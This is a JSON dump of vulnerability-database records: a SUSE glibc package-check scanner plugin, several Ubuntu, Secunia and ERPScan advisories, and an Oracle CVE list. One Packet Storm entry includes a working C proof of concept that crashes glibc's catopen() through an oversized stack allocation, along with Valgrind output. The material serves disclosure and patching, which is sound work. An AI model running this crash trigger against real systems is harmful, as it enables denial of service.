rpm_check(release:\"SUSE13.2\", reference:\"glibc-locale-debuginfo-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-obsolete-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-obsolete-debuginfo-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-profile-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-utils-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-utils-debuginfo-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-utils-debugsource-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"nscd-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"nscd-debuginfo-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-devel-debuginfo-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-devel-static-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-locale-debuginfo-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.19-16.22.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc-utils / glibc-utils-32bit / glibc-utils-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-11-03T10:28:32", "description": "", "published": "2016-01-26T00:00:00", "type": "packetstorm", "title": "glibc catopen() Unbounded Stack Allocations", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-01-26T00:00:00", "id": "PACKETSTORM:135387", "href": "https://packetstormsecurity.com/files/135387/glibc-catopen-Unbounded-Stack-Allocations.html", "sourceData": "`glibc catopen() Multiple unbounded stack allocations \nURL: https://cxsecurity.com/issue/WLB-2016010149 \n \n--------------------------------------- \nPoC: \n \n#include <nl_types.h> \n#include <string.h> \n#include <stdlib.h> \n \nint main(){ \n \nchar *buff; \nbuff=malloc(11111111); \nmemset(buff,'A',11111110); \nbuff[11111110]='\\0'; \n \ncatopen(buff, NL_CAT_LOCALE); \n \nreturn 0; \n} \n--------------------------------------- \n \n \n======================== \n \n==25788== Memcheck, a memory error detector \n==25788== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. \n==25788== Using Valgrind-3.10.0.SVN and LibVEX; rerun with -h for copyright info \n==25788== Command: ./cato \n==25788== \n==25788== Warning: client switching stacks? SP change: 0xfff000330 --> 0xffe567648 \n==25788== to suppress, use: --max-stackframe=11111656 or greater \n==25788== Invalid write of size 8 \n==25788== at 0x4E6CD5A: __open_catalog (open_catalog.c:102) \n==25788== by 0x4E6C38E: catopen (catgets.c:71) \n==25788== by 0x400616: main (in /home/kalibaba/cato) \n==25788== Address 0xffe567648 is on thread 1's stack \n==25788== \n==25788== \n==25788== Process terminating with default action of signal 11 (SIGSEGV) \n==25788== Access not within mapped region at address 0xFFE567648 \n==25788== at 0x4E6CD5A: __open_catalog (open_catalog.c:102) \n==25788== If you believe this happened as a result of a stack \n==25788== overflow in your program's main thread (unlikely but \n==25788== possible), you can try to increase the size of the \n==25788== main thread stack using the --main-stacksize= flag. \n==25788== The main thread stack size used in this run was 8388608. \n \n \n======================== \n \nopen_catalog.c \n \n#define ENOUGH(n) \nif (__builtin_expect (bufact + (n) >= bufmax, 0)) \n{ \nchar *old_buf = buf; \nbufmax += 256 + (n); \nbuf = (char *) alloca (bufmax); <=============== \nmemcpy (buf, old_buf, bufact); \n} \n \n \nand others alloca() in catopen() \n \n--- Links --- \nhttps://sourceware.org/bugzilla/show_bug.cgi?id=17905 \nhttps://sourceware.org/git/gitweb.cgi?p=glibc.git;h=7565d2a862683a3c26ffb1f32351b8c5ab9f7b31 \nhttps://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f58539030e436449f79189b6edab17d7479796e \nhttps://www.securecoding.cert.org/confluence/display/seccode/MEM05-C.+Avoid+large+stack+allocations \n \n--- Credit --- \nMaksymilian Arciemowicz from CXSECURITY \nhttps://cxsecurity.com \nhttp://cifrex.org \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/135387/WLB-2016010149.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}